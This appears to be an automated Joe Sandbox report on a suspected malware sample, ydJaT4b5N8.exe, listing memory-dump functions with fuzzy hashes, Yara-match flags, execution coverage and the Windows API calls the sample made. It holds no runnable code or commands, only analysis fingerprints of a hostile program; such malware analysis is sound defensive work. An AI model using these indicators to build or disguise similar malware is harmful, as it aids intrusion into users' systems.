Memory Dump Source

Source File: 00000000.00000002.1429642584.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8f80000_ydJaT4b5N8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b2a48d706381c3627b8d65ccbcad664592df4bcd55a169633ccf7497bb3a13f
Instruction ID: c317bdafd2d034496c5366ceab1f2448b62588ef3d2afabb058fc07c3b37f806
Opcode Fuzzy Hash: 2b2a48d706381c3627b8d65ccbcad664592df4bcd55a169633ccf7497bb3a13f
Instruction Fuzzy Hash: BAE1E574E00619CFDB14DFA9C580AAEFBB2BF89315F248269D415AB355D730AD42CF60

Function 08F8A1A8 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1429642584.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8f80000_ydJaT4b5N8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37237127e989e4b75c01666918e7f904e087165b18bde970bffc2ab480080cb0
Instruction ID: da821ed82db4175a044a46650beaa6724038262e125395ae475898db7831fa71
Opcode Fuzzy Hash: 37237127e989e4b75c01666918e7f904e087165b18bde970bffc2ab480080cb0
Instruction Fuzzy Hash: CBE1F774E00229CFDB14DFA9C580AAEBBB2FF89305F24816AD415AB355D731AD42CF61

Function 08F8A5E0 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1429642584.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8f80000_ydJaT4b5N8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48dccca4f0f9b8cea567cd17a4c2ba1f18ee2751d6af5670755661c48171714a
Instruction ID: 657081ff4687b1a80f5db26519c56308dd18f4de0151aef85c0b9be7e81c2e61
Opcode Fuzzy Hash: 48dccca4f0f9b8cea567cd17a4c2ba1f18ee2751d6af5670755661c48171714a
Instruction Fuzzy Hash: 50E1D874E00229CFDB14DFA9C580AAEBBB2FF89305F24816AD455AB355D730AD42CF61

Function 04C79F40 Relevance: .3, Instructions: 280COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1427987063.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c70000_ydJaT4b5N8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea002f0c80cbd73813c14e8ee6b1bf6e0555fd40bce5dce826b74bece396fb6a
Instruction ID: 3d7e44c2d11e9f27f7778c656f09ac129c4f36e2dcdec6f4cde5c19729dcdae5
Opcode Fuzzy Hash: ea002f0c80cbd73813c14e8ee6b1bf6e0555fd40bce5dce826b74bece396fb6a
Instruction Fuzzy Hash: 21B1D070B142158FD715CF69C89067EFBF3AFC6300B18896AE49ADB269D635ED41CB40

Function 04C79EF8 Relevance: .3, Instructions: 275COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1427987063.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c70000_ydJaT4b5N8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9c42688bce3937a81ff15b1aecc89d39c4a99997662197dd42fb4108ed5e69f
Instruction ID: 3f329816381beb3cbfc2c296b5f7e019cf64938432fe9da81511fe4372922854
Opcode Fuzzy Hash: f9c42688bce3937a81ff15b1aecc89d39c4a99997662197dd42fb4108ed5e69f
Instruction Fuzzy Hash: CDB1C170B182508FD715CB69C89067EFBF3AFC6300B19896AE49AD7269D635FD41CB40

Function 04C7E8D0 Relevance: .3, Instructions: 271COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1427987063.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c70000_ydJaT4b5N8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bdeff2f40e3426ae5645b5c6101a7073a89093a3536af74553188306fa3ede5b
Instruction ID: 60772ff57821c5934829ef7b981f680c734e39e792e7ac5f0ba2d90f4e84a906
Opcode Fuzzy Hash: bdeff2f40e3426ae5645b5c6101a7073a89093a3536af74553188306fa3ede5b
Instruction Fuzzy Hash: 0FD1D639D20B5A8ADB14EFA5D950A99F771FF95300F20879AD0093B215FB70AAC9CF41

Function 04C715B4 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1427987063.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c70000_ydJaT4b5N8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27d2304b79b27cb4ddc09d3e243ccdc8b90fd7628d7ff56d3166390691a8fe08
Instruction ID: 177f48f7c022ff71697f7c215addd95d14f1e8c0c47323e1e87f5a073500127d
Opcode Fuzzy Hash: 27d2304b79b27cb4ddc09d3e243ccdc8b90fd7628d7ff56d3166390691a8fe08
Instruction Fuzzy Hash: A1A17D36E00205CFDF05DFB5C88459EBBB3FF84304B1985AAE805AB261DB71E956CB90

Function 04C7E8E0 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1427987063.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c70000_ydJaT4b5N8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7157d3e54e34593eeddf58b22b036bf84ee6f3fe2b1f396f4eed558577197ca
Instruction ID: cb45854586ec6bcc25f4f08fafa1e4de0732d792b70579399e678ddf11889a78
Opcode Fuzzy Hash: d7157d3e54e34593eeddf58b22b036bf84ee6f3fe2b1f396f4eed558577197ca
Instruction Fuzzy Hash: CDD1C639D20B5A8ADB14EFA5D950A99F771FF95300F20879AD00937215FB70AAC5CF81

Function 04C735A8 Relevance: .2, Instructions: 221COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1427987063.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c70000_ydJaT4b5N8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 831e3c20440438330add4db394c2dbfcb9f91386585aca89d1f815e69092d809
Instruction ID: 434f13e3994ac53630ab20cb8d7cf4ad2af94bb6edfd4fa8d8d277d596dd1c54
Opcode Fuzzy Hash: 831e3c20440438330add4db394c2dbfcb9f91386585aca89d1f815e69092d809
Instruction Fuzzy Hash: 6CC1E6B1C91745CBD710CF65E84E28D7BB2BB85324F906B09D2626B2D4DBB414EACF48

Function 08F8AF80 Relevance: .1, Instructions: 139COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1429642584.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8f80000_ydJaT4b5N8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9acf3a174f542dc34684eb22f840ba8170d29cb928d6b40a43d681c22aa51e8e
Instruction ID: 606299a3565d630bc58c5e41f7509fd5f986313e8f9407c02dff77652fa07601
Opcode Fuzzy Hash: 9acf3a174f542dc34684eb22f840ba8170d29cb928d6b40a43d681c22aa51e8e
Instruction Fuzzy Hash: 55512970E00619CFDB14DFA9C5805AEFBB2FF89211F24816AD419AB356D7319D42CFA1

Function 08F8A198 Relevance: .1, Instructions: 135COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1429642584.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8f80000_ydJaT4b5N8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01aebf83f0dd3a994b33c9d735167a011dc3a8baddca34a60759ebd4e83dadbe
Instruction ID: 31449f8ef4d66fa2d3d4b866ab807bb03fe7330832eada1429823124a95d0480
Opcode Fuzzy Hash: 01aebf83f0dd3a994b33c9d735167a011dc3a8baddca34a60759ebd4e83dadbe
Instruction Fuzzy Hash: 97510870E04229CFDB14DFA9C5809AEFBB2FF89305F24816AD419AB355D7319942CFA1

Function 00AD36F9 Relevance: .1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1423953076.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_ydJaT4b5N8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22d0144ba9c43f48e097c5ad309dc59e872d988a91d84cde610df3be60f8b0d6
Instruction ID: 44cf2219c5ef5d0b7b7e9e0465052b60333786de7640cd27c03e88f0806b28eb
Opcode Fuzzy Hash: 22d0144ba9c43f48e097c5ad309dc59e872d988a91d84cde610df3be60f8b0d6
Instruction Fuzzy Hash: BB41B4B7B14615CFCF40CF69C98146AFBF5BB88340B258027D806EB761C234CA419B92

Function 00AD3708 Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1423953076.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_ydJaT4b5N8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f11cc4867cd88cac36460466805fda9c5d95617b92ea84e3e2b4e83ff451eda
Instruction ID: 18a06b129686337faf9f8e0ca7182d118a820aad7a05ff1741631252b92ca466
Opcode Fuzzy Hash: 1f11cc4867cd88cac36460466805fda9c5d95617b92ea84e3e2b4e83ff451eda
Instruction Fuzzy Hash: DB4182B7F1461ACFCF44CF69C98156AF6F6BB88350B25D027D406EB750C234DA419A92

Function 00AD2B82 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1423953076.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_ydJaT4b5N8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0416c50b3f25968c5e4e8c25622510788dc1c4cbd0a7484418dbcb4355e2b58d
Instruction ID: 622894f53a5dcd8556d6762e441218c7be3b90aec8bea0c3af9d4473381e9e31
Opcode Fuzzy Hash: 0416c50b3f25968c5e4e8c25622510788dc1c4cbd0a7484418dbcb4355e2b58d
Instruction Fuzzy Hash: 184180316246058FC764CF69C88566ABBF2FF95310B14886BE06BDB764D274E991CF01

Function 00AD1641 Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1423953076.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_ydJaT4b5N8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72294057c7bceb185b52ba1ac227355275ef0f6589b367586431cca04ffa9069
Instruction ID: 8800caf03dc3ed0a3e7329456d210dbf7efbf4fc055c5542ef91bd2aeed54a75
Opcode Fuzzy Hash: 72294057c7bceb185b52ba1ac227355275ef0f6589b367586431cca04ffa9069
Instruction Fuzzy Hash: 3831F331A14115ABC704CFA8C981AAAF7B6BB95350F24C62BD517DBB50D730EE11CBE2

Function 00AD2B90 Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1423953076.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_ydJaT4b5N8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c6836d13f4ffb7a5798779ebc7f1a5e216c433cfb4ca2f63a0912c4e25ee63e
Instruction ID: f667c86a39c062ba90c2888e556b2f61c61866deb6aaa862cd1f9cc4fbc3bdf7
Opcode Fuzzy Hash: 3c6836d13f4ffb7a5798779ebc7f1a5e216c433cfb4ca2f63a0912c4e25ee63e
Instruction Fuzzy Hash: 75419C31620605CFC764CE29C885A6AB7F2FB94310B24C86BE06BDB714D270E941CF41

Function 08F8CA8E Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1429642584.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8f80000_ydJaT4b5N8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bbd6dccf9aafead14ae694b7dbaa5a419caca2a2006a7a74b8ce1d90fac73cc7
Instruction ID: a79ea322b41e6ad92579fdede090d13582aaaeae67446f749aec2ed3a07df023
Opcode Fuzzy Hash: bbd6dccf9aafead14ae694b7dbaa5a419caca2a2006a7a74b8ce1d90fac73cc7
Instruction Fuzzy Hash: 25F0823690D248CFCB90FF64E8452F8BB78EF4B312F012092D01E97292C33169A9CE10

Analysis Process: ydJaT4b5N8.exePID: 7632, Parent PID: 1528COMMON

Execution Graph

Execution Coverage:	1.1%
Dynamic/Decrypted Code Coverage:	5.4%
Signature Coverage:	5.4%
Total number of Nodes:	130
Total number of Limit Nodes:	7

Executed Functions

Function 00417863 Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004178D5

Memory Dump Source

Source File: 0000000A.00000002.1659559960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_ydJaT4b5N8.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: b18edf98c350b0ea1304a1d31adb18bef4c879a074b46a0256bb5cefda4eb289
Instruction ID: acb3d0ca3bfc6cd9205d56c84439d3c8982d981d0a04349ebcdbd1500f69d46e
Opcode Fuzzy Hash: b18edf98c350b0ea1304a1d31adb18bef4c879a074b46a0256bb5cefda4eb289
Instruction Fuzzy Hash: 8B0112B5E0010DB7DF10EAE5DC46FDEB7789B54308F4081A6E90897241F635EB58C755

Function 0042C813 Relevance: 1.5, APIs: 1, Instructions: 25
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C847

Memory Dump Source

Source File: 0000000A.00000002.1659559960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_ydJaT4b5N8.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: e33e25bd6fdd54fc274541ce9e87240fbf749594cc00fe192e3613e851b57e26
Instruction ID: bfb76fc1da067b1220f20817ffeca303efa816792864c47cc19693669ec29f02
Opcode Fuzzy Hash: e33e25bd6fdd54fc274541ce9e87240fbf749594cc00fe192e3613e851b57e26
Instruction Fuzzy Hash: 4FE04F712402147BD610EA5ADC41F9B775CDFC5754F40802AFA18AB241C670B90087A9

Function 013E2B60 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 013E2B6A

Memory Dump Source

Source File: 0000000A.00000002.1660862435.0000000001370000.00000040.00001000.00020000.00000000.sdmp, Offset: 01370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1370000_ydJaT4b5N8.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 89fab2963815a0da32ad02c14e70edd93665f4c6ba89aed716d6247e3c345c6f
Instruction ID: 250a445fbcc2112af25d8207beb54d5a112e47ca9714c6031cc99d25e5400063
Opcode Fuzzy Hash: 89fab2963815a0da32ad02c14e70edd93665f4c6ba89aed716d6247e3c345c6f
Instruction Fuzzy Hash: F5900265202400039909715C4414616400AD7E1205B55C065E2014590DC625C9A96225

Function 013E2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 013E2DFA

Memory Dump Source

Source File: 0000000A.00000002.1660862435.0000000001370000.00000040.00001000.00020000.00000000.sdmp, Offset: 01370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1370000_ydJaT4b5N8.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 07600319bd97e0ed303a5ced87aebaf3ee07458de4faa51660f064ca95a11146
Instruction ID: 5a1f0ef41b991337d33f3a2f7cb2424128ee3b545c9ac937b468eabc9fda2779
Opcode Fuzzy Hash: 07600319bd97e0ed303a5ced87aebaf3ee07458de4faa51660f064ca95a11146
Instruction Fuzzy Hash: CA90023520140413E915715C45047070009D7D1245F95C456A1424558DD756CA6AA221

Function 013E2C70 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 013E2C7A

Memory Dump Source

Source File: 0000000A.00000002.1660862435.0000000001370000.00000040.00001000.00020000.00000000.sdmp, Offset: 01370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1370000_ydJaT4b5N8.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5cf959f9284ae05ec4808a3f6b8576e680b1ef4fd437754ce0b33bde41f21eb0
Instruction ID: 8b2bfa92b85080c02447456054b6f82c653fa069b2e51bf68a21e2af0579bf44
Opcode Fuzzy Hash: 5cf959f9284ae05ec4808a3f6b8576e680b1ef4fd437754ce0b33bde41f21eb0
Instruction Fuzzy Hash: 5B90023520148802E914715C840474A0005D7D1305F59C455A5424658DC795C9A97221

Function 013E35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 013E35CA

Memory Dump Source

Source File: 0000000A.00000002.1660862435.0000000001370000.00000040.00001000.00020000.00000000.sdmp, Offset: 01370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1370000_ydJaT4b5N8.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2962afb7be2b8eb6391a2147749e12a2835e60309ab7cb10a26b44292480b06a
Instruction ID: a68448f2201e1c4f5155864795ff3f42e575e255ff3f275f02f5e2e45d50f6e7
Opcode Fuzzy Hash: 2962afb7be2b8eb6391a2147749e12a2835e60309ab7cb10a26b44292480b06a
Instruction Fuzzy Hash: 8F90023560550402E904715C45147061005D7D1205F65C455A1424568DC795CA6966A2

Function 00414093 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(FyF7rO8j-P,00000111,00000000,00000000), ref: 00414110

Strings

FyF7rO8j-P, xrefs: 00414103, 0041410F, 00414120
FyF7rO8j-P, xrefs: 00414117, 0041411A

Memory Dump Source

Source File: 0000000A.00000002.1659559960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_ydJaT4b5N8.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: FyF7rO8j-P$FyF7rO8j-P
API String ID: 1836367815-1867050091
Opcode ID: d198ee28ad3b4463dd080392ceb30629e6f0bbd52a84946530d47119ce426f63
Instruction ID: 2dcf5f84174d90d554a8059e4f3444cacb65385d417d39fc40c045cb6d611ebc
Opcode Fuzzy Hash: d198ee28ad3b4463dd080392ceb30629e6f0bbd52a84946530d47119ce426f63
Instruction Fuzzy Hash: 36012671E4021876EB21A6A19C42FDF7B7C9F81B54F00811AFB007B2C0E6BC660687E9

Function 00417920 Relevance: 1.6, APIs: 1, Instructions: 76
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004178D5

Memory Dump Source

Source File: 0000000A.00000002.1659559960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_ydJaT4b5N8.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: f2d14ee1e7492503946815e61b655c992f68404d0b02cc3cc4c9d8b133a63c09
Instruction ID: 5543dce4ac3969383cdb4ce043557de7e00b17c27474fc914391881c937b6262
Opcode Fuzzy Hash: f2d14ee1e7492503946815e61b655c992f68404d0b02cc3cc4c9d8b133a63c09
Instruction Fuzzy Hash: 4A11ED3159850A9FD720EFA4CC90ACABBB4FF03728B14429AE8108F242E2215997C7C2

Function 0042CB43 Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(?,0041E63E,?,?,00000000,?,0041E63E,?,?,?), ref: 0042CB82

Memory Dump Source

Source File: 0000000A.00000002.1659559960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_ydJaT4b5N8.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 1e4350b7d44d6a684fffbbc4693371c34b8573f8f32981f1b3782ec455faae52
Instruction ID: d2df43cae920e000db8bc7660f8ea8487e2b9ee56a98c8278f0e207b49934158
Opcode Fuzzy Hash: 1e4350b7d44d6a684fffbbc4693371c34b8573f8f32981f1b3782ec455faae52
Instruction Fuzzy Hash: 7CE039B2604204BBE614EF59EC81E9B77ACEF85714F004119FA18A7241C670B91086B9

Function 0042CB93 Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000000,00000004,00000000,9C43F5A5,00000007,00000000,00000004,00000000,004170D4,000000F4), ref: 0042CBCF

Memory Dump Source

Source File: 0000000A.00000002.1659559960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_ydJaT4b5N8.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: db2d3549d1a8baec21659a79dd3a681137d7f9f8529d6d7c189c3593deaec9d3
Instruction ID: 9470b5117a7bb16c62de66de8cd5a1c574757c9822323de237a7012e01705a7f
Opcode Fuzzy Hash: db2d3549d1a8baec21659a79dd3a681137d7f9f8529d6d7c189c3593deaec9d3
Instruction Fuzzy Hash: AFE06DB12042187FD710EE59EC41F9B37ACEFC9754F008019FA18AB241C670B91087B9

Function 0042CBE3 Relevance: 1.5, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(?,00000000,00000000,?,7A80088A,?,?,7A80088A), ref: 0042CC17

Memory Dump Source

Source File: 0000000A.00000002.1659559960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_ydJaT4b5N8.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: a0d9b928619a6387db6d909656c54b9f8f56cc9266dd321b60363f79da0f6673
Instruction ID: 81848fe488f4fca1cf91c32fcd6b3539e4b7fca7d40b19f22644c55c329edd83
Opcode Fuzzy Hash: a0d9b928619a6387db6d909656c54b9f8f56cc9266dd321b60363f79da0f6673
Instruction Fuzzy Hash: 93E086716402147BD220FB5ADC41F9B776CEFC6754F40851AFB18A7241C671B90187F5

Function 013E2C0A Relevance: 1.5, APIs: 1, Instructions: 8
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 013E2C24

Memory Dump Source

Source File: 0000000A.00000002.1660862435.0000000001370000.00000040.00001000.00020000.00000000.sdmp, Offset: 01370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1370000_ydJaT4b5N8.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a465c710e6e60762dd62d7ae304c8721492377ded09065f99fd66d8792446008
Instruction ID: e6ca865963b012ccef533208b56ca9216a1bacfbc4a044fe8a91e99f3ee82be9
Opcode Fuzzy Hash: a465c710e6e60762dd62d7ae304c8721492377ded09065f99fd66d8792446008
Instruction Fuzzy Hash: BAB09B719015D5C5EE15E764460C7177954B7D1705F15C065D3030645F4738C1E5E275

Non-executed Functions

Function 01422349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON

Download Yara Rule

Strings

Initializing the application verifier package failed with status 0x%08lx, xrefs: 01423176
RaiseExceptionOnPossibleDeadlock, xrefs: 01422579
@, xrefs: 01422942
ShutdownFlags, xrefs: 014224A1
MaxLoaderThreads, xrefs: 014224EC
MinimumStackCommitInBytes, xrefs: 01422BB0
ExecuteOptions, xrefs: 014225A0
DisableHeapLookaside, xrefs: 0142246D
minkernel\ntdll\ldrinit.c, xrefs: 01423187
DisableExceptionChainValidation, xrefs: 0142275F
@, xrefs: 01422B74
MaxDeadActivationContexts, xrefs: 01422D82
GlobalFlag, xrefs: 01422F3F, 01423059
UseImpersonatedDeviceMap, xrefs: 0142251C
TracingFlags, xrefs: 01422549
GlobalFlag2, xrefs: 01422FC0
UnloadEventTraceDepth, xrefs: 014224C0
FrontEndHeapDebugOptions, xrefs: 01422489
CFGOptions, xrefs: 01422967
LdrpInitializeExecutionOptions, xrefs: 0142317D

Memory Dump Source

Source File: 0000000A.00000002.1660862435.0000000001370000.00000040.00001000.00020000.00000000.sdmp, Offset: 01370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1370000_ydJaT4b5N8.jbxd

Similarity

API ID:
String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
API String ID: 0-2160512332
Opcode ID: 66e0bc054e19178c704a71f012f7fd43915e4fad3a87f9315217c94efd9365a7
Instruction ID: 9c08a081a20602d247579f36ddf0832f9798d15b9c1ec786f7b7268fbd2b5224
Opcode Fuzzy Hash: 66e0bc054e19178c704a71f012f7fd43915e4fad3a87f9315217c94efd9365a7
Instruction Fuzzy Hash: E5929F71604362ABE721DF28C880F6BB7E8BB84754F44491EFA94D7360D7B0E885CB52

Function 013D8620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON

Download Yara Rule

Strings

Thread is in a state in which it cannot own a critical section, xrefs: 01415543
Address of the debug info found in the active list., xrefs: 014154AE, 014154FA
Critical section debug info address, xrefs: 0141541F, 0141552E
undeleted critical section in freed memory, xrefs: 0141542B
Critical section address, xrefs: 01415425, 014154BC, 01415534
Thread identifier, xrefs: 0141553A
8, xrefs: 014152E3
double initialized or corrupted critical section, xrefs: 01415508
First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 014154E2
Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0141540A, 01415496, 01415519
Critical section address., xrefs: 01415502
corrupted critical section, xrefs: 014154C2
Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 014154CE
Invalid debug info address of this critical section, xrefs: 014154B6

Memory Dump Source

Source File: 0000000A.00000002.1660862435.0000000001370000.00000040.00001000.00020000.00000000.sdmp, Offset: 01370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1370000_ydJaT4b5N8.jbxd

Similarity

API ID:
String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
API String ID: 0-2368682639
Opcode ID: a2a7ec1e994d5675ab064fe45821582cb32c89f959d181642c333313527453f1
Instruction ID: 0b04060455da738c61c7554eb0aa491a7451481809557a83f68f6a435a6d5824
